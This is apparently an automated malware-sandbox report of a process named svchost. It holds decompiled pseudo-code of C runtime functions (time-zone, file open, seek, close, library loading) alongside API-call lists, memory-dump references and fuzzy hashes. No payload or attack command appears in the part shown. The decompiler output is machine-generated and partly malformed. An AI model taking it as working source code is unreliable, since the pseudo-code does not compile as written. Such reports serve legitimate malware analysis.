                            				signed int _t21;
                            				void* _t27;
                            				signed int _t36;
                            				void* _t38;
                            				signed int _t42;
                            				signed int _t44;
                            				signed int _t45;
                            
                            				_t10 =  *0xbec008; // 0x2eb5fe5e
                            				_v8 = _t10 ^ _t45;
                            				 *0xbec91c =  *0xbec91c | 0xffffffff;
                            				 *0xbec910 =  *0xbec910 | 0xffffffff;
                            				_push(_t38);
                            				_t25 = "TZ";
                            				_t36 = 0;
                            				 *0xbf6578 = 0;
                            				_t14 = E00BD6CC0("TZ", __edx, 0, _t38, __eflags,  &_v268,  &_v264, 0x100, "TZ");
                            				if(_t14 != 0) {
                            					__eflags = _t14 - 0x22;
                            					if(__eflags == 0) {
                            						_t44 = E00BD0A25(_t27, _v268);
                            						__eflags = _t44;
                            						if(__eflags != 0) {
                            							_t21 = E00BD6CC0(_t25, __edx, 0, _t44, __eflags,  &_v272, _t44, _v268, _t25);
                            							__eflags = _t21;
                            							if(_t21 == 0) {
                            								E00BD09EB(0);
                            								_t36 = _t44;
                            							} else {
                            								_push(_t44);
                            								goto L5;
                            							}
                            						} else {
                            							_push(0);
                            							L5:
                            							E00BD09EB();
                            						}
                            					}
                            				} else {
                            					_t36 =  &_v264;
                            				}
                            				asm("sbb esi, esi");
                            				_t42 =  ~(_t36 -  &_v264) & _t36;
                            				if(_t36 == 0) {
                            					L13:
                            					E00BDB193(__eflags); // executed
                            				} else {
                            					_t52 =  *_t36;
                            					if( *_t36 == 0) {
                            						goto L13;
                            					} else {
                            						_push(_t36);
                            						E00BDAFBE(_t52);
                            					}
                            				}
                            				_t17 = E00BD09EB(_t42);
                            				E00BC786A();
                            				return _t17;
                            			}






















                            APIs
                            • _free.LIBCMT ref: 00BDB361
                            • _free.LIBCMT ref: 00BDB3B7
                              • Part of subcall function 00BDB193: _free.LIBCMT ref: 00BDB1EB
                              • Part of subcall function 00BDB193: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                              • Part of subcall function 00BDB193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                              • Part of subcall function 00BDB193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 6186146ad07172cd16297303837b4b7bbf2c5d3edad3ac5e4bd1f3237c515ef2
                            • Instruction ID: f73aa9235887102a54a9830897f76a1018698745e2d2808f339524419713c613
                            • Opcode Fuzzy Hash: 6186146ad07172cd16297303837b4b7bbf2c5d3edad3ac5e4bd1f3237c515ef2
                            • Instruction Fuzzy Hash: 89212976800218D6DB35A6259C82EEAF7F8DB51370F1202D7E894A3381FF704E85D695
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BD18F4(void* __eflags, signed int _a4) {
                            				intOrPtr _t13;
                            				int _t15;
                            				void* _t21;
                            				signed int _t33;
                            				long _t35;
                            
                            				_t33 = _a4;
                            				if(E00BCE926(_t33) != 0xffffffff) {
                            					_t13 =  *0xbf6108; // 0x100a8e8
                            					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
                            						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
                            							goto L7;
                            						} else {
                            							goto L6;
                            						}
                            					} else {
                            						L6:
                            						_t21 = E00BCE926(2);
                            						if(E00BCE926(1) == _t21) {
                            							goto L1;
                            						}
                            						L7:
                            						_t15 = FindCloseChangeNotification(E00BCE926(_t33)); // executed
                            						if(_t15 != 0) {
                            							goto L1;
                            						}
                            						_t35 = GetLastError();
                            						L9:
                            						E00BCE895(_t33);
                            						 *((char*)( *((intOrPtr*)(0xbf6108 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
                            						if(_t35 == 0) {
                            							return 0;
                            						}
                            						return E00BCC998(_t35) | 0xffffffff;
                            					}
                            				}
                            				L1:
                            				_t35 = 0;
                            				goto L9;
                            			}









                            APIs
                            • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,00BD1812,?), ref: 00BD194A
                            • GetLastError.KERNEL32(?,00BD1812,?), ref: 00BD1954
                            • __dosmaperr.LIBCMT ref: 00BD197F
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                            • String ID:
                            • API String ID: 490808831-0
                            • Opcode ID: 5a1a84e88ebd24ffd9d85538f602de16fd2cf5c76908a7882cb156b8d7f42b8c
                            • Instruction ID: bcb90055afd35b8a1550d97581d9db2b4f95aab8b160c37cc0d63313617daa17
                            • Opcode Fuzzy Hash: 5a1a84e88ebd24ffd9d85538f602de16fd2cf5c76908a7882cb156b8d7f42b8c
                            • Instruction Fuzzy Hash: F2010832A0421476DA75237CA875B7DA7C9CB81775F2505DEE8299B3C3EEB8DC838190
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E00BD276E(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
                            				signed int _v8;
                            				void* _v12;
                            				void* _t15;
                            				int _t16;
                            				signed int _t19;
                            				signed int _t32;
                            				signed int _t33;
                            				signed int _t36;
                            
                            				_t36 = _a4;
                            				_push(_t32);
                            				_t15 = E00BCE926(_t36);
                            				_t33 = _t32 | 0xffffffff;
                            				if(_t15 != _t33) {
                            					_push(_a16);
                            					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
                            					if(_t16 != 0) {
                            						if((_v12 & _v8) == _t33) {
                            							goto L2;
                            						} else {
                            							_t19 = _v12;
                            							_t39 = (_t36 & 0x0000003f) * 0x30;
                            							 *( *((intOrPtr*)(0xbf6108 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0xbf6108 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
                            						}
                            					} else {
                            						E00BCC998(GetLastError());
                            						goto L2;
                            					}
                            				} else {
                            					 *((intOrPtr*)(E00BCC9CE())) = 9;
                            					L2:
                            					_t19 = _t33;
                            				}
                            				return _t19;
                            			}












                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,00BD281D,?,00000000,00000002,00000000), ref: 00BD27A7
                            • GetLastError.KERNEL32(?,00BD281D,?,00000000,00000002,00000000,?,00BD3143,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00BD27B1
                            • __dosmaperr.LIBCMT ref: 00BD27B8
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID:
                            • API String ID: 2336955059-0
                            • Opcode ID: d74e7f7bd27a0a5f0a2e088d0f7fae0308ba25fd7660655a9f0aee226c63ec2d
                            • Instruction ID: 7820ddce9f5f1defbc10987eae1e93d047a4f985c6bb35140995f0b629dcaaaa
                            • Opcode Fuzzy Hash: d74e7f7bd27a0a5f0a2e088d0f7fae0308ba25fd7660655a9f0aee226c63ec2d
                            • Instruction Fuzzy Hash: FD019033614144ABCF219F58DC41DAD7B69EB81330B240289F8149B391FAB0DD408790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E00BCCA68(WCHAR* _a4, void* _a8) {
                            				void* _v8;
                            				void _v56;
                            				void* __edi;
                            				signed int _t17;
                            				void* _t18;
                            				signed int _t19;
                            				signed int _t20;
                            				intOrPtr* _t25;
                            				signed int _t26;
                            				signed int _t34;
                            				signed int _t36;
                            				void* _t39;
                            				signed int _t42;
                            				signed int _t44;
                            				void* _t45;
                            				WCHAR* _t49;
                            				void* _t56;
                            				intOrPtr _t59;
                            				void* _t60;
                            				void* _t62;
                            
                            				if(_a8 != 0) {
                            					_push(_t45);
                            					_t34 = 0;
                            					E00BC8520(_t45,  &_v56, 0, 0x30);
                            					_t36 = 0xc;
                            					memcpy(_a8,  &_v56, _t36 << 2);
                            					_t62 = _t60 + 0x18;
                            					_t49 = _a4;
                            					__eflags = _t49;
                            					if(_t49 != 0) {
                            						_t17 = E00BD5190(_t49, L"?*");
                            						_pop(_t39);
                            						__eflags = _t17;
                            						if(_t17 == 0) {
                            							_t18 = CreateFileW(_t49, 0x80, 7, 0, 3, 0x2000000, 0); // executed
                            							_push(_a8);
                            							_t56 = _t18;
                            							_v8 = _t56;
                            							__eflags = _t56 - 0xffffffff;
                            							if(__eflags == 0) {
                            								_push(_t49);
                            								_t19 = E00BCCB6F(_t39, _t44, _t49, __eflags);
                            							} else {
                            								_push(_t56);
                            								_push(0xffffffff);
                            								_push(_t49); // executed
                            								_t19 = E00BCCBFB(_t44); // executed
                            								_t62 = _t62 + 0x10;
                            							}
                            							__eflags = _t19;
                            							if(_t19 == 0) {
                            								E00BC8520(_t49,  &_v56, _t34, 0x30);
                            								_t34 = _t34 | 0xffffffff;
                            								__eflags = _t34;
                            								_t42 = 0xc;
                            								memcpy(_a8,  &_v56, _t42 << 2);
                            								_t56 = _v8;
                            							}
                            							__eflags = _t56 - 0xffffffff;
                            							if(_t56 != 0xffffffff) {
                            								CloseHandle(_t56);
                            							}
                            							_t20 = _t34;
                            							L15:
                            							return _t20;
                            						}
                            						_t25 = E00BCC9CE();
                            						_t59 = 2;
                            						 *_t25 = _t59;
                            						_t26 = E00BCC9BB();
                            						 *_t26 = _t59;
                            						L6:
                            						_t20 = _t26 | 0xffffffff;
                            						goto L15;
                            					}
                            					 *(E00BCC9BB()) = 0;
                            					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            					_t26 = E00BD1788();
                            					goto L6;
                            				}
                            				 *(E00BCC9BB()) =  *_t29 & 0x00000000;
                            				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            				return E00BD1788() | 0xffffffff;
                            			}
























                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 773d7f38ceb036a4f5e3af9875c8baa617566c7472c25bffb9b3bccefcadf1b0
                            • Instruction ID: f0de4c3dc31bde5c32b23e09d9b28a932663bd49cee2a7f28384d8d4f4b2e188
                            • Opcode Fuzzy Hash: 773d7f38ceb036a4f5e3af9875c8baa617566c7472c25bffb9b3bccefcadf1b0
                            • Instruction Fuzzy Hash: F731D97190020CBADB217BA49C86FAE3BE8DF12735F200299F9686B1D1DBB05D019665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E00BC13D0(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                            				signed int _v4;
                            				void* _v8;
                            				char _v92;
                            				void* _v100;
                            				char _v104;
                            				signed int _t12;
                            				signed int _t14;
                            				void* _t17;
                            				void* _t21;
                            				intOrPtr* _t31;
                            				char* _t35;
                            				signed int _t42;
                            				void* _t43;
                            
                            				_t42 =  &_v100;
                            				_t12 =  *0xbec008; // 0x2eb5fe5e
                            				_v4 = _t12 ^ _t42;
                            				_t31 = _a4;
                            				_t35 =  &_v92;
                            				_t21 = _a8 + 0xffffffa0;
                            				_t14 = E00BC9F16(__edx,  *_t31, _t21, 0); // executed
                            				_t43 = _t42 + 0xc;
                            				if(_t14 != 0) {
                            					L5:
                            					E00BC786A();
                            					return _t14 | 0xffffffff;
                            				} else {
                            					_t14 = E00BC9B2B( &_v100, 0x60, 1,  *_t31); // executed
                            					_t43 = _t43 + 0x10;
                            					if(_t14 < 1) {
                            						goto L5;
                            					} else {
                            						while(1) {
                            							_t17 = E00BC9780(0xbe0340, _t35, 8);
                            							_t43 = _t43 + 0xc;
                            							if(_t17 == 0) {
                            								break;
                            							}
                            							_t35 = _t35 - 1;
                            							_t14 =  &_v100;
                            							if(_t35 >= _t14) {
                            								continue;
                            							} else {
                            								goto L5;
                            							}
                            							goto L7;
                            						}
                            						asm("movups xmm0, [esi]");
                            						asm("movups [edi+0x10], xmm0");
                            						asm("movups xmm0, [esi+0x10]");
                            						asm("movups [edi+0x20], xmm0");
                            						asm("movups xmm0, [esi+0x20]");
                            						asm("movups [edi+0x30], xmm0");
                            						asm("movups xmm0, [esi+0x30]");
                            						asm("movups [edi+0x40], xmm0");
                            						asm("movups xmm0, [esi+0x40]");
                            						asm("movups [edi+0x50], xmm0");
                            						asm("movq xmm0, [esi+0x50]");
                            						asm("movq [edi+0x60], xmm0");
                            						_push( *((intOrPtr*)(_t31 + 0x18)));
                            						L00BC7864();
                            						 *((intOrPtr*)(_t31 + 4)) = _t35 -  &_v104 + _t21 - _t17 + 0x58;
                            						E00BC786A();
                            						return 0;
                            					}
                            				}
                            				L7:
                            			}

















                            APIs
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __fread_nolockhtonl
                            • String ID:
                            • API String ID: 822407656-0
                            • Opcode ID: 97bbcec2b5d3a7bbfad269f17599036ca15f58a2a9f729a2676a345977fc263a
                            • Instruction ID: 1e82537b5a56d4b96169fa9a5473ff706fd661c50897dbb97d0780f7f272d75a
                            • Opcode Fuzzy Hash: 97bbcec2b5d3a7bbfad269f17599036ca15f58a2a9f729a2676a345977fc263a
                            • Instruction Fuzzy Hash: B121F232E04B41A7D2149B398C02BA6F3E0FFA8304F809B1DF99862642FB21F5D4C681
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00BC9FC9(signed int __edx, intOrPtr* _a4) {
                            				char _v5;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t64;
                            				signed int _t66;
                            				signed char _t68;
                            				signed int _t70;
                            				signed char _t77;
                            				intOrPtr* _t78;
                            				signed int _t79;
                            				signed char _t80;
                            				intOrPtr _t82;
                            				intOrPtr _t83;
                            				signed int _t90;
                            				intOrPtr _t93;
                            				signed int _t94;
                            				intOrPtr* _t95;
                            				signed char _t96;
                            				signed int _t99;
                            				signed int _t100;
                            				signed int _t103;
                            				signed int _t109;
                            				signed int _t111;
                            				signed int _t113;
                            				signed int _t114;
                            				signed int _t115;
                            				signed int _t118;
                            				signed int _t120;
                            
                            				_t104 = __edx;
                            				if(_a4 != 0) {
                            					_t64 = E00BD09C5(_a4);
                            					_t93 = _a4;
                            					_t118 = _t64;
                            					__eflags =  *(_t93 + 8);
                            					if( *(_t93 + 8) < 0) {
                            						 *(_t93 + 8) = 0;
                            					}
                            					_t66 = E00BD27EC(_t118, 0, 0, 1); // executed
                            					_t90 = _t104;
                            					_t109 = _t66;
                            					_v12 = _t109;
                            					__eflags = _t90;
                            					if(__eflags > 0) {
                            						L7:
                            						_t68 =  *(_a4 + 0xc);
                            						__eflags = _t68 & 0x000000c0;
                            						if((_t68 & 0x000000c0) != 0) {
                            							_t70 = _t118 >> 6;
                            							_t94 = (_t118 & 0x0000003f) * 0x30;
                            							_v16 = _t70;
                            							_v20 = _t94;
                            							_t95 = _a4;
                            							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0xbf6108 + _t70 * 4)) + 0x29));
                            							_t96 =  *(_t95 + 0xc);
                            							asm("cdq");
                            							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
                            							__eflags = _t96 & 0x00000003;
                            							if((_t96 & 0x00000003) == 0) {
                            								_t77 =  *(_a4 + 0xc) >> 2;
                            								__eflags = _t77 & 0x00000001;
                            								if((_t77 & 0x00000001) != 0) {
                            									L23:
                            									_t78 = _a4;
                            									L24:
                            									__eflags = _t109 | _t90;
                            									if((_t109 | _t90) == 0) {
                            										L30:
                            										_t79 = _t120;
                            										goto L31;
                            									}
                            									_t80 =  *(_t78 + 0xc);
                            									__eflags = _t80 & 0x00000001;
                            									if((_t80 & 0x00000001) == 0) {
                            										__eflags = _v5 - 1;
                            										if(_v5 == 1) {
                            											_t120 = E00BC7AE0(_t120, _t104, 2, 0);
                            										}
                            										_t120 = _t120 + _t109;
                            										asm("adc edx, ebx");
                            										goto L30;
                            									}
                            									_t79 = E00BCA15E(_a4, _t109, _t90, _t120, _t104);
                            									goto L31;
                            								}
                            								_t66 = E00BCC9CE();
                            								 *_t66 = 0x16;
                            								goto L22;
                            							}
                            							__eflags = _v5 - 1;
                            							_t99 = _v16;
                            							if(_v5 != 1) {
                            								L13:
                            								_t82 =  *((intOrPtr*)(0xbf6108 + _t99 * 4));
                            								_t100 = _v20;
                            								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
                            								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
                            									goto L23;
                            								}
                            								_t78 = _a4;
                            								_v20 = _v20 & 0x00000000;
                            								_t111 =  *(_t78 + 4);
                            								__eflags =  *_t78 - _t111;
                            								asm("sbb edi, edi");
                            								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
                            								__eflags = _t113;
                            								_v16 = _t113;
                            								_t109 = _v12;
                            								if(_t113 == 0) {
                            									goto L24;
                            								}
                            								_t103 =  *(_t78 + 4);
                            								_t114 = _v20;
                            								do {
                            									__eflags =  *_t103 - 0xa;
                            									if( *_t103 == 0xa) {
                            										_t120 = _t120 + 1;
                            										asm("adc edx, 0x0");
                            									}
                            									_t103 = _t103 + 1;
                            									_t114 = _t114 + 1;
                            									__eflags = _t114 - _v16;
                            								} while (_t114 != _v16);
                            								_t109 = _v12;
                            								goto L24;
                            							}
                            							_t115 = _v20;
                            							_t83 =  *((intOrPtr*)(0xbf6108 + _t99 * 4));
                            							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
                            							_t109 = _v12;
                            							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
                            								goto L13;
                            							}
                            							_t79 = E00BCA2E2(_a4, _t109, _t90);
                            							goto L31;
                            						}
                            						asm("cdq");
                            						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
                            						asm("sbb ebx, edx");
                            						goto L31;
                            					} else {
                            						if(__eflags < 0) {
                            							L22:
                            							_t79 = _t66 | 0xffffffff;
                            							L31:
                            							return _t79;
                            						}
                            						__eflags = _t109;
                            						if(_t109 < 0) {
                            							goto L22;
                            						}
                            						goto L7;
                            					}
                            				}
                            				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            				return E00BD1788() | 0xffffffff;
                            			}

































                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d1fc46791b9e3200a6fce7744e3afeebe35c6002caad1449ffb62de4669e78d
                            • Instruction ID: 06f90de71917399901a4da8fb41af17769d9c45d04c9d0061b4bc8f9ee6dd2e4
                            • Opcode Fuzzy Hash: 0d1fc46791b9e3200a6fce7744e3afeebe35c6002caad1449ffb62de4669e78d
                            • Instruction Fuzzy Hash: 2B51A331A00108AFDB10DF58CC45FA97BE1EB86368F1981DCE859AB392C731ED42CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E00BD5E01(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
                            				char _v8;
                            				char _v12;
                            				void* _v16;
                            				intOrPtr _v20;
                            				char _v32;
                            				void* _t25;
                            
                            				E00BD5BBD( &_v32, _a8);
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				if(_v12 != 0) {
                            					_t25 = E00BDC048( &_v8, _a4, _v20, _a12, 0x180); // executed
                            					if(_t25 != 0) {
                            						goto L1;
                            					}
                            					 *0xbf5e8c =  *0xbf5e8c + 1;
                            					asm("lock or [eax], ecx");
                            					 *((intOrPtr*)(_a16 + 8)) = 0;
                            					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
                            					 *((intOrPtr*)(_a16 + 4)) = 0;
                            					 *_a16 = 0;
                            					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
                            					return _a16;
                            				}
                            				L1:
                            				return 0;
                            			}










                            APIs
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 28979cc709d8941b9c4d28f71ba508f7fcaafc182ec92faab910ec3ddf5a8fc4
                            • Instruction ID: 4749c0ad2d4d7a32950f73a485365c86cc4aa61e214a628b243b54308546b5e9
                            • Opcode Fuzzy Hash: 28979cc709d8941b9c4d28f71ba508f7fcaafc182ec92faab910ec3ddf5a8fc4
                            • Instruction Fuzzy Hash: 0711187190410AAFCF15DF58E94199B7BF4EF49310F10449AF808AB311E671DA25CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E00BC9813(void* __ecx, intOrPtr _a4) {
                            				void* _t16;
                            				void* _t24;
                            				signed int _t25;
                            				signed int _t26;
                            				intOrPtr _t28;
                            
                            				_t28 = _a4;
                            				if(_t28 == 0) {
                            					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            					return E00BD1788() | 0xffffffff;
                            				}
                            				_push(_t25);
                            				_t26 = _t25 | 0xffffffff;
                            				if(( *(_t28 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
                            					_t26 = E00BCDA31(_t24, _t28);
                            					E00BD1AED(_t28);
                            					_t16 = E00BD1875(E00BD09C5(_t28)); // executed
                            					if(_t16 >= 0) {
                            						if( *(_t28 + 0x1c) != 0) {
                            							E00BD09EB( *(_t28 + 0x1c));
                            							 *(_t28 + 0x1c) =  *(_t28 + 0x1c) & 0x00000000;
                            						}
                            					} else {
                            						_t26 = _t26 | 0xffffffff;
                            					}
                            				}
                            				E00BD19EF(_t28);
                            				return _t26;
                            			}









                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72a8c654f6fac3ccc1ce1d9488a34fdefc3d72a290b71712b2914838413e8dd8
                            • Instruction ID: 3ec6ac1e0fac62b92dd238b78566d40616af34fe1b7c88307c26b85daa2e9e91
                            • Opcode Fuzzy Hash: 72a8c654f6fac3ccc1ce1d9488a34fdefc3d72a290b71712b2914838413e8dd8
                            • Instruction Fuzzy Hash: F6F0283250261067EB21766DDC09F5B76D88F433B0F110B9EF565D33D2EB74D80286A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BC4590(char* _a4) {
                            				struct HINSTANCE__* _t3;
                            
                            				_t6 = E00BC4BF0(0, _a4, 0);
                            				_t3 = LoadLibraryExW(_t2, 0, 8); // executed
                            				L00BC9803(_t6);
                            				return _t3;
                            			}





                            APIs
                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,00BC3540,?,?,?,?,00000000,00BC263F,00000000,00000000), ref: 00BC45A9
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharLibraryLoadMultiWide
                            • String ID:
                            • API String ID: 2592636585-0
                            • Opcode ID: c484b7fa667f8a2eeae4308530e4419f6ce8845a633c1366325e0087f3044667
                            • Instruction ID: 81004cdbffbcb28dd2e88db96e21640bd340ff13311145dcfb4d3e358e47d8f2
